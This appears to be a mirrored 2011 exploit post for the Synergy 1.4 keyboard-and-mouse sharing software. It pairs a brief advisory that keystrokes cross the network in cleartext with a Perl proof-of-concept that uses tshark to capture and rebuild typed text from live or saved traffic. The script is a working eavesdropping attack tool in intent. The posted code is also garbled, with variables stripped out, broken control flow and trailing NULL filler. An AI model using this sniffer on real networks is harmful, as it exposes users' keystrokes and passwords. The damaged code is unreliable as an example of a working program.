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Synergy 1.4 Protocol Cleartext Weakness Proof Of Concept
来源:vfocus.net 作者:Sw1tCh 发布时间:2011-04-08  
# Exploit Title: Synergy Protocol cleartext weakness PoC
# Date:April 5th 2011
# Author: Sw1tCh
# Software Link: http://synergy-foss.org/
# Version: 1.4

# -= Info =-
*Synergy* is *Free and Open Source Software* that lets you easily share your
mouse and keyboard between multiple computers, where each computer has it's
own display. No special hardware is required, all you need is a local area
network. Synergy is supported on Windows, Mac OS X and Linux. [Source =~

#-= The Advisory =-
Synergy's sends all keystrokes and mouse movements in clear text.  This
presents a huge vulnerability because if anyone is capturing packets on the
network, they could eavesdrop on all information passed between the multiple

# -= PoC Script =-

# synergyCap.pl - Developed by Sw1tCh to show the insecurity in Synergy
Deskop Sharing application
# The program works a lot better when through a closed network of one type
of another
# [such as an SSH tunnel]
# [Note: The text isn't clear.  Because of the protocol, text is sent in TCP
and even with protocol
# Standards, text does come out of order.
# Obligatory Shouts -> gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's

use constant BANNER => q{

        /  /           synergyCap -> Live or Forensic extractor of text
     /        /         from computers using Synergy Screen sharing
    / <( - )>  /
    /          /       PoC Developed by Sw1tCh 2011
     /        /       -> Need to work on my tshark filters...My perl is
better :)
        /  /
           Softward -> Synergy - http://synergy-foss.org/

        - synergyCap.pl -forensic -file [FILE]
        - synergyCap.pl -live -interface [device {example eth0} ]


# ----- INCLUDES ----- #
use strict;
use warnings;
use Getopt::Long;
use Switch;
use Time::HiRes qw( usleep sleep );
use Term::ANSIColor qw(:constants);
local $Term::ANSIColor::AUTORESET = 1;

print "\n";

my $forensic = 0;
my $live = 0;
my $options = "";
my $capChar = "";

GetOptions (
'forensic' => \$forensic ,
'live' => \$live ,
'file'  => \my $pcap_file ,
'interface'  => \my $interface ,


unless ( $ARGV[0]  ) { print "ERROR : Bad file or Interface\n"; exit; }
unless ( $live || $forensic ) { print "ERROR : No Option Specified [Live /
or / Forensic \n"; exit; }

if ( $live =~ m/1/ ) { $options = "i"; }
elsif ( $forensic =~ m/1/ ) { $options = "r"; }

open( TSHARK , "tshark -". $options . " " . $ARGV[0] ." -V |" ) or die
"Failed to open TSHARK: $!";

while( <TSHARK> )
if (
=~ /Key Id/) { if(
=~ s/Key Id\x3A\s//) { if (
< 128){ print " " . chr(
) . "\n"; $capChar = $capChar. chr(
); } } } } print "\n\n$capChar "; print "\n---+ Completed +--- \n"; close( TSHARK ); #Credits: Sw1tCh #Shoutouts : gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's -- NULL, NULL NULL NULL NULL NULL NULL NULL NULL.NULL (NULL) NULL - NULL

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